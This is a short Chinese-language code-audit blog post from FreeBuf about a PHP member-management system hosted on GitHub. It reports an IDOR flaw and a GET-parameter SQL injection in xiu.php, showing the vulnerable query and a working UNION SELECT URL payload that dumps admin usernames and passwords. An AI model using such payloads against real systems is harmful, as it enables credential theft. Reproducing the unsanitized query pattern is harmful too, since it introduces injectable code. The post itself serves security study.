freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

记一次简单的代码审计
2018-12-06 16:30:23

这段时间在想着做个高校的会员管理系统,所以在chrome上装了个掘金插件,今天发现日推推了个类似的PHP写的小程序
image.png

本着能省就省,有自行车还造什么轮子的原则

于是乎

git clone https://github.com/chaodada/member.git

经过简单的部署后算是能打开了

image.pngimage.pngimage.png后台UI做的真心差评

image.png然后简单的看了下代码,发现几个SQL注入和一个越权

SQL注入

程序使用PDO连接数据库,后台使用了预编译SQL指令,没多大问题

看看前台用户处

xiu.php

image.png

if (isset($_GET['id'])) {
    $sql = "select id,username,password,integral,**,email from u_users WHERE 1=1 and id={$_GET['id']} ";
    $res = $pdo->query($sql);
    list($id, $username, $password, $integral, $**, $email) = $res->fetch(PDO::FETCH_NUM);
}

很明显的GET型注入
爆管理员密码的payload:

http://localhost/member-master/member-master/user/xiu_user.php?id=-37 union select 1,2,group_concat(username,0x2a,password,0x20,mpw),4,5,6 from memsystem.u_admin %23

image.png

越权

同样还是刚才那个位置
image.pngimage.pngid修改后即可更改任意用户信息

总结

这套程序距离实用还有不小的距离 适合入门级选手审计练手
程序下载地址:https://github.com/chaodada/member.git


# 代码审计
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者